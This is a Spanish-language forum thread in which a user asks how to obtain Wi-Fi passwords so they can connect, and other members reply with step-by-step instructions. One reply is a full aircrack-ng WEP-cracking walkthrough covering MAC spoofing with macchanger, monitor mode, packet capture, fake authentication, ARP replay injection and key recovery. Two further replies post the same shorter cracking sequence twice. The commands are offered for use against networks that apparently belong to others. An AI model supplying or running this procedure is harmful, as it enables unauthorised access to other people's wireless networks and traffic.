![]() |
|
|
#1 | |
|
Novato
![]() Fecha de Ingreso: marzo-2010
Amigos 0
Agradecido 3 veces en 3 mensajes.
|
Alguien me puede indicar como sacar claves de wifi para poder conectarme ya que he visto algunos programas pero no me funcionan o si hay alguno que me expliquen como hacerlo..
Gracias. Saludos.
|
|
|
|
|
#2 | ||||||
|
Veterano
![]() Fecha de Ingreso: diciembre-2007
Amigos 1
Agradecido 38 veces en 33 mensajes.
|
Cita:
yoooo!!!! yoooo!!!! yoooo!!!! ...yo te voy a ayudar... uno de los 3 temas pegados de esta area tiene el titulo que dice: Adherido:
Defc0n1..entra ahi y te juro por las bolas de papa noel que saldras hecho un wifi-cracker..
|
|
|
|
#3 | ||||||
|
Gran Colaborador
![]() Fecha de Ingreso: julio-2005
Amigos 1
Agradecido 66 veces en 40 mensajes.
|
Cita:
|
||||||
|
|
|
|
|
#4 |
|
Recien llegado
![]() Fecha de Ingreso: junio-2010
Amigos 0
Agradecido 0 veces en 0 mensajes.
|
******************************SI TIENES UBUNTU******************************************** ***********************************
LO PRIMERO DEBES VERIFICAR SI TU TARJETA SIRVE PARA AUDITORIA LO PUEDES HACER DESDE WINDOWS CON CardCheck.EXE SI TE RECONOCE EL CHIPSET ESTAS ECHO //___________verifico si aircrack esta instalado_______ sistema--->administracion--->gestor de paquete signa buscar="aircrak" --y si esta instalado en la parte izquierda y derecha encontraremos su nombre y listo seguimos **********************************ABRIMOS UNA CONSOLA******************************************* ********** -ingresar como rOOt(sudo su) -das tu contraseña de usuario -desde aca tambien puedes instalar aircrack-ng ejecutando lo siguiente(pero como root para tener todos los privilegios) -apt-get install aircrack-ng (enter)+(s/N)=s -apt-get install macchanger (enter) es una aplicacion para cambiar la MAC 0) en la terminal coloco su--> luego pide ingresar la clave "la que pusimos en el paso anterior" 1) iwconfig ( para saber que tarjeta de red inalambrica se tiene) 2) ifconfig wlan0 down (si queremos cambiar nuestra MAC la damos de baja) 3) macchanger -m 00:11:22 44:55 wlan0 (Con esto cambiamos nuestra MAC pero primero guardas la MAC original para despues restaurarla) 4) ifconfig wlan0 up (levantamos la tarjeta) 5) airmon-ng start wlan0 (para poner en modo monitor la tarjeta de red para que pueda capturar paquetes) (monitor mode enabled mon0) mon1 mon2 etc escoge una 6)airodump-ng -w paketes mon0 (paketes=cualquier nombre solo es el nombre donde se guardan los data que capturamos) (bueno aqui miramos el listado AP que estan a nuestro alcance escogemos el de mayor potencia) 7)con ctrl+c para parar"ya abiendo descubierto el canal en mi caso el 6 y el BSSID que es la MAC del AP" 8)airodump-ng -w paketes -c 6 --bssid MAC AP mon0 -w (es para que capture datos) -c (indicar el canal a utilizar) --bssid (MAC del Access Point al cual atacamos) **************************ABRIMOS OTRA CONSOLA PARA REPLICAR LA INYECCION DE TRAFICO******************************************* **************** 9) aireplay-ng -1 0 -e paketes -a (MAC AP) -h (MAC de nuestra tarjeta) mon0 (esto es para autenticarnos) 10) aireplay-ng -3 -b (MAC AP) -h (MAC de nuestra tarjeta) mon0 (con esto aceleramos el trafico de datos) ( aqui esperamos que capture por lo minimo 150000 data) *****************************ABRIMOS OTRA CONSOLA PARA ENCONTRAR LA CLAVE************************************* 11) aircrack-ng -z paketesxx (xx=es la ultima captura este archivo lo encuentras en la carpeta personal) Y ESPERAMOS QUE DIGA KEY FOUND(******) POR ULTIMO PARAMOS LA TARJETA QUE ESTABA EN MODO MONITOR CON airmon-ng stop wlan0 |
|
|
|
|
|
#5 |
|
Colaborador
![]() Fecha de Ingreso: enero-2008
Amigos 1
Agradecido 6 veces en 3 mensajes.
|
Este es el que yo uso con ubuntu y si funciona espero te sirva de algo
ifconfig (para ver la mac de tu tarjeta) sudo airmon-ng start wlan0 sudo airodump-ng mon0 sudo airmon-ng stop wlan0 sudo airmon-ng start wlan0 sudo airodump-ng -w prueba1 -c(aqui va el canal) mon0 (regreso a la primera consola) sudo aireplay-ng -1 30 -e (nombre de la red) -a (BBSID) -h (mac de mi tarjeta) mon0 (si no sale la carita esta malo) sudo aireplay-ng -3 -x600 -b (BBSID) -H(MAC DE MI TARJETA) mon0 sudo aircrack-ng prueba-01.cap ahi comentas tus resultados
|
|
|
#6 |
|
Colaborador
![]() Fecha de Ingreso: enero-2008
Amigos 1
Agradecido 6 veces en 3 mensajes.
|
Este es el que yo uso con ubuntu y si funciona espero te sirva de algo
ifconfig (para ver la mac de tu tarjeta) sudo airmon-ng start wlan0 sudo airodump-ng mon0 sudo airmon-ng stop wlan0 sudo airmon-ng start wlan0 sudo airodump-ng -w prueba1 -c(aqui va el canal) mon0 (regreso a la primera consola) sudo aireplay-ng -1 30 -e (nombre de la red) -a (BBSID) -h (mac de mi tarjeta) mon0 (si no sale la carita esta malo) sudo aireplay-ng -3 -x600 -b (BBSID) -H(MAC DE MI TARJETA) mon0 sudo aircrack-ng prueba-01.cap ahi comentas tus resultados
|
![]() |
| Herramientas | |
| Desplegado | |
|
|